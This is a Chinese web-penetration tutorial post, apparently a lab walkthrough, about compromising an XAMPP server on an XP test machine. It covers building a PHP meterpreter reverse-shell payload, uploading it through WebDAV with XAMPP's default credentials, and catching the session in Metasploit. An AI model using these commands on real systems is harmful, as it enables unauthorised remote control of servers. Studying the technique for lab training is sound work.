前言:
目前我们对“apache配置webdav用户”大概比较着重,看官们都需要学习一些“apache配置webdav用户”的相关文章。那么小编同时在网络上搜集了一些对于“apache配置webdav用户””的相关内容,希望我们能喜欢,大家快快来了解一下吧!用于网络安全渗透测试,禁止用于不当目的!
测试环境
之前我们搭建的测试靶机xp,已经内置了XAMPP web服务器组件。
在这个XAMPP组件中,大家可以看到安装有phpMyAdmin软件,它是一个网页版的数据库管理平台,显然我们可以看到xp安装了apache服务,支持web形式的访问和数据支持,另外还有php组件,说明只要通过任何浏览器访问xp的web服务页面地址路径(通常指定一个php后缀的文件),就能打开php的文件。
攻击思路:
既然xp安装了xampp,等同于可以运行php后缀的文件,我们只要通过一些技术手段上传一个php载荷小马即可,这种php载荷是不用在目标靶机进行运行的,我们只需要在本地kali进行远程触发即可(因为php或者jsp类型的文件本来就是放在web服务器根目录中让他人通过浏览器进行访问读取的!懂?)
注意:xp靶机的xampp必须开启!
实战测试生成windows平台php远控
kali终端下输入:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888 -f raw > xiaobai.php发送远控
这里我们需要上传xiaobai.php小马到我们的xp服务器(xampp)中。
那如何实现上传呢?
其实在xp上安装的这个xampp存在WebDAV服务器程序,而且这个版本xampp的WebDAV口令都是默认的(一般不会更改)(一般web扫描软件并不会发现)
WebDAV是一个分布式文件管理服务器,用于上下传文件使用的。我们可以使用kali自带的客户端Cadaver程序来进行连接。
Kali终端下输入:
cadaver
默认的用户名是:wampp,密码是xampp!
如图:你发现已经成功进行了连接,而且还能使用ls命令查看当前webdav目录下的文件,甚至可以删除、上传、下载!这就是我们的一个突破口!
在webdav的当前终端下输入:
?
即可显示所有支持的命令!我们这里选择put命令,上传kali的php小马上去!
输入:
put xiaobai.php
你会发现已经成功上传我们的php载荷到xp的webdav服务器中了,你可以使用ls再次查看!
设置msf监听
Kali终端下输入:
msfconsole,启动metasploit
设置相关侦听模块和载荷以及参数
use multi/handlerset payload php/meterpreter/reverse_tcpset LHOSTS 192.168.31.251set LPORT 8888run
提示:这里的meterpreter会话有时候不一定会建立成功,但是这种攻击方法,你一定要会,在web渗透中,这就是常用的伎俩。
关注小白嘿客,学习完整的web渗透,可以点击《白帽黑客web渗透指南》进入我的嘿客专栏获得永久学习哦!
欢迎点赞、评论、转发!
标签: #apache配置webdav用户